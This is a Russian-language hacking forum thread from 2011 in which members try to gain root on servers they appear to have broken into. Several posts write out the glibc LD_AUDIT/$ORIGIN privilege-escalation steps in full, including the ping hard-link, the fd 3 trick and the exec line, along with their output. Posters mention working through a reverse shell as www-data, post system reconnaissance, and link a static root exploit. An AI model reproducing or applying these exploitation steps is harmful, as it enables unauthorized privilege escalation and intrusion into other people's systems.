Старый 19.11.2011, 17:29   #221
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

Зачем конектица?

https://rdot.org/forum/showpost.php?p=20173&postcount=30

glibc_nondebian.sh
Pashkela вне форума   Ответить с цитированием
Старый 19.11.2011, 20:27   #222
dumb
 
Регистрация: 01.10.2011
Сообщений: 63
Репутация: 1
По умолчанию

Pashkela, спасибо сработало!

На другом сервере оказалось что нет gcc
Код:
$ ls -la /lib/libc*
-rwxr-xr-x 1 root root 1572232 Jan 22  2011 /lib/libc-2.11.1.so
lrwxrwxrwx 1 root root      14 Jan 29  2011 /lib/libc.so.6 -> libc-2.11.1.so
lrwxrwxrwx 1 root root      14 Sep  5  2010 /lib/libcap.so.2 -> libcap.so.2.17
-rw-r--r-- 1 root root   18888 Mar  8  2010 /lib/libcap.so.2.17
-rw-r--r-- 1 root root  190840 Jan 22  2011 /lib/libcidn-2.11.1.so
lrwxrwxrwx 1 root root      17 Jan 29  2011 /lib/libcidn.so.1 -> libcidn-2.11.1.so
lrwxrwxrwx 1 root root      17 Sep  5  2010 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rw-r--r-- 1 root root   14584 Aug 17  2010 /lib/libcom_err.so.2.1
-rw-r--r-- 1 root root   43296 Jan 22  2011 /lib/libcrypt-2.11.1.so
lrwxrwxrwx 1 root root      18 Jan 29  2011 /lib/libcrypt.so.1 -> libcrypt-2.11.1.so
-rw-r--r-- 1 root root 1622304 Feb 10  2011 /lib/libcrypto.so.0.9.8
$ uname -a
Linux blog2 2.6.32-23-server #37-Ubuntu SMP Fri Jun 11 09:11:11 UTC 2010 x86_64 GNU/Linux
$ gcc 
sh: gcc: not found
$ qcc 
sh: qcc: not found
Пробовал "построчно" запустить ваш башик (и через бэкконнект и в шелле), но траблы с выполнением последней строки:
Код:
$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 2>&1
exec: 1: /proc/self/fd/3: No such device or address
хотя хард линк создается! файлы exploit2 и sh(из вашего башика) компилировал на локалке (видимо в этом и проблема...но там нет gcc)
dumb вне форума   Ответить с цитированием
Старый 19.11.2011, 20:32   #223
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

Цитата:
1572232 Jan 22 2011 /lib/libc-2.11.1.so
ку-ку, дату смотрим и читайте внимательнее тему про glibc

PS: uname -a может быть и от 2006, но пропатченный
Pashkela вне форума   Ответить с цитированием
Старый 19.11.2011, 20:56   #224
salut
 
Регистрация: 07.04.2011
Сообщений: 65
Репутация: 0
По умолчанию

Цитата:
Linux praecipua 2.6.32.36-hardened #9 SMP Tue Mar 29 09:29:20 PDT 2011 x86_64 GNU/Linux
Цитата:
$ ls -la /boot
total 4444
drwxr-xr-x 3 root root 4096 Aug 11 2010 .
drwxr-xr-x 24 root root 4096 Sep 18 00:54 ..
drwxr-xr-x 2 root root 4096 Aug 11 2010 grub
-rw-r--r-- 1 root root 4522416 Aug 11 2010 vmlinuz-2.6.32.8-grsec-2.1.14-modsign-xeon-64
Цитата:
$ df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda1 28G 3.9G 23G 15% /
tmpfs 7.9G 0 7.9G 0% /lib/init/rw
tmpfs 7.9G 0 7.9G 0% /dev/shm
/dev/sda2 7.4G 638M 6.4G 9% /tmp
/dev/sdb1 3.6T 810G 2.8T 23% /home
Цитата:
$ ls -la /lib/libc*
-rwxr-xr-x 1 root root 1375536 Jan 7 2011 /lib/libc-2.7.so
lrwxrwxrwx 1 root root 11 Jun 16 13:10 /lib/libc.so.6 -> libc-2.7.so
lrwxrwxrwx 1 root root 14 Mar 5 2009 /lib/libcap.so.1 -> libcap.so.1.10
-rw-r--r-- 1 root root 14880 Mar 16 2006 /lib/libcap.so.1.10
lrwxrwxrwx 1 root root 14 Mar 5 2009 /lib/libcap.so.2 -> libcap.so.2.11
-rw-r--r-- 1 root root 16976 Jul 26 2008 /lib/libcap.so.2.11
lrwxrwxrwx 1 root root 17 Mar 5 2009 /lib/libcfont.so.0 -> libcfont.so.0.0.0
-rw-r--r-- 1 root root 12776 Apr 15 2008 /lib/libcfont.so.0.0.0
-rw-r--r-- 1 root root 190760 Jan 7 2011 /lib/libcidn-2.7.so
lrwxrwxrwx 1 root root 14 Jun 16 13:10 /lib/libcidn.so.1 -> libcidn-2.7.so
lrwxrwxrwx 1 root root 17 Mar 5 2009 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rw-r--r-- 1 root root 11648 Oct 12 2008 /lib/libcom_err.so.2.1
lrwxrwxrwx 1 root root 19 Mar 5 2009 /lib/libconsole.so.0 -> libconsole.so.0.0.0
-rw-r--r-- 1 root root 140840 Apr 15 2008 /lib/libconsole.so.0.0.0
-rw-r--r-- 1 root root 39112 Jan 7 2011 /lib/libcrypt-2.7.so
lrwxrwxrwx 1 root root 15 Jun 16 13:10 /lib/libcrypt.so.1 -> libcrypt-2.7.so
lrwxrwxrwx 1 root root 19 Mar 5 2009 /lib/libctutils.so.0 -> libctutils.so.0.0.0
-rw-r--r-- 1 root root 21024 Apr 15 2008 /lib/libctutils.so.0.0.0
Цитата:
$ mount
/dev/sda1 on / type ext3 (rw,errors=remount-ro)
tmpfs on /lib/init/rw type tmpfs (rw,nosuid,mode=0755)
proc on /proc type proc (rw,noexec,nosuid,nodev)
sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=620)
/dev/sda2 on /tmp type ext3 (rw,noexec,noatime,nodiratime,data=ordered,commit= 300)
/dev/sdb1 on /home type ext3 (rw,nosuid,nodev,noatime,nodiratime,errors=remount-ro,data=ordered)
что то можно ?
salut вне форума   Ответить с цитированием
Старый 19.11.2011, 21:12   #225
dumb
 
Регистрация: 01.10.2011
Сообщений: 63
Репутация: 1
По умолчанию

Ясно, просмотрел... =\
Код:
$ ls -la /lib/libc* 2>&1
-rwxr-xr-x 1 root root 1606808 Feb 18  2009 /lib/libc-2.5.so
lrwxrwxrwx 1 root root      11 May 22  2009 /lib/libc.so.6 -> libc-2.5.so
lrwxrwxrwx 1 root root      17 May 23  2009 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rwxr-xr-x 1 root root    7748 Jan 21  2009 /lib/libcom_err.so.2.1
-rwxr-xr-x 1 root root   45288 Feb 18  2009 /lib/libcrypt-2.5.so
lrwxrwxrwx 1 root root      15 May 23  2009 /lib/libcrypt.so.1 -> libcrypt-2.5.so
-rwxr-xr-x 1 root root 1296772 Mar  3  2009 /lib/libcrypto.so.0.9.8e
lrwxrwxrwx 1 root root      19 May 22  2009 /lib/libcrypto.so.6 -> libcrypto.so.0.9.8e
Но тоже нет gcc...
Код:
ln /bin/ping ./exploit/target
срабатывает, но
Код:
$ cp exploit2 exploit 2>&1
sh: cp: command not found
уже нет...
dumb вне форума   Ответить с цитированием
Старый 19.11.2011, 21:31   #226
b3
 
Аватар для b3
 
Регистрация: 18.08.2010
Сообщений: 352
Репутация: 105
По умолчанию

Цитата:
Ну раз уж так, то попробуй mv вместо cp
/bin/cp используйте полные адреса, т.к. у вас по ходу $PATH пустой.
Цитата:
построчно выполнить команды
Построчно в данном случае нельзя из-за $$, поэтому если не асиливаете башик то пропишите команды в одну строку разделяя ;(тчк. запятая) или &&(два амперсанда) но башик лучше, если будет ошибка вида "бэд интерпретир" обработайте башик dos2unix для преобразования разрывов строк с \r\n в \n как любит линукс.
b3 вне форума   Ответить с цитированием
Старый 19.11.2011, 21:40   #227
col
 
Регистрация: 17.03.2011
Сообщений: 180
Репутация: 8
По умолчанию

Цитата:
Сообщение от dumb Посмотреть сообщение
Pashkela, спасибо сработало!

На другом сервере оказалось что нет gcc

$ uname -a
Linux blog2 2.6.32-23-server #37-Ubuntu SMP Fri Jun 11 09:11:11 UTC 2010 x86_64 GNU/Linux
тебе поможет статически скомпиленый abftw http://www.sendspace.com/file/ysk006
col вне форума   Ответить с цитированием
Старый 20.11.2011, 02:18   #228
BRO
 
Регистрация: 15.07.2010
Сообщений: 49
Репутация: 0
По умолчанию

Linux microscopium 2.6.32.8-grsec-2.1.14-modsign-xeon-64 #2 SMP Sat Mar 13 00:42:43 PST 2010 x86_64

Что можно заюзать?
BRO вне форума   Ответить с цитированием
Старый 20.11.2011, 04:32   #229
col
 
Регистрация: 17.03.2011
Сообщений: 180
Репутация: 8
По умолчанию

ничего
col вне форума   Ответить с цитированием
Старый 20.11.2011, 08:43   #230
dumb
 
Регистрация: 01.10.2011
Сообщений: 63
Репутация: 1
По умолчанию

Через бэкконнект:
Код:
$ mkdir /tmp/exploit
$ ln /bin/ping /tmp/exploit/target
$ exec 3< /tmp/exploit/target
$ ls -l /proc/$$/fd/3
lr-x------ 1 www-data www-data 64 Nov 20 08:28 /proc/26599/fd/3 -> /tmp/exploit/target
$ rm -rf /tmp/exploit/
$ ls -l /proc/$$/fd/3
lr-x------ 1 www-data www-data 64 Nov 20 08:28 /proc/26599/fd/3 -> /tmp/exploit/target (deleted)
$ ls -l /tmp/exploit
-rw-r--r-- 1 www-data www-data 6901 Nov 20 08:28 /tmp/exploit
$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
            [-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
            [-M mtu discovery hint] [-S sndbuf]
            [ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
и всё, просто висит...
Такой же итог после выполнения одной строкой(и через бк и в шелле):
Код:
mkdir ./exploit && ln /bin/ping ./exploit/target && exec 3< ./exploit/target && rm -rf ./exploit && cp exploit2 exploit && chmod 0755 exploit && LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
Код:
$ cd $HOME
$ mkdir ./exploit && ln /bin/ping ./exploit/target && exec 3< ./exploit/target && rm -rf ./exploit && cp exploit2 exploit && chmod 0755 exploit && LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
            [-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
            [-M mtu discovery hint] [-S sndbuf]
            [ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
^Z
dumb вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot